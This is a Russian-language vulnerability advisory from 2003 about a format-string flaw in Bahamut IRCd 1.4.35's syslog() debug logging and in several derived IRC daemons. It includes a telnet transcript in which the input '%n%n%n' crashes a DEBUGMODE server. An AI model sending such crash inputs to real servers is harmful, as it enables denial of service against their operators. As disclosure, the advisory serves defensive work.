Уязвимость форматной строки в Bahamut IRCd и в связанных IRCd серверах

Дата публикации:
30.06.2003
Всего просмотров:
1050
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость форматной строки обнаружена в Bahamut IRCd. Удаленный пользователь может выполнить произвольный код на целевой системе.

Уязвимость форматной строки обнаружена в 'src/s_debug.c' и может эксплуатироваться, если сервер конфигурирован с режимом DEBUGMODE. Программное обеспечение выполняет syslog() запрос, не определяя строку формата и не фильтруя пользовательские данные.

Чтобы эксплуатировать уязвимость, удаленный пользователь может подключится к IRC серверу и послать специально обработанную строку формата:

 [je@vudo ~]$ telnet 127.0.0.1 6667
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
:server.dal.net NOTICE AUTH :*** Looking up your hostname...
:server.dal.net NOTICE AUTH :*** Checking Ident
:server.dal.net NOTICE AUTH :*** Found your hostname
:server.dal.net NOTICE AUTH :*** No Ident response
%n%n%n
Connection closed by foreign host.
[je@vudo ~]$ telnet 127.0.0.1 6667
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
[je@vudo ~]$ 
Другие IRC демоны, основанные на Bahamut, также уязвимы - digatech-1.2.1, methane-0.1.1, и AndromedeIRCd1.2.3-Release.

Уязвимость обнаружена в Bahamut IRCd 1.4.35

Ссылки: DoS эксплоит
Bahamut IRCd <= 1.4.35 and several derived daemons

или введите имя

CAPTCHA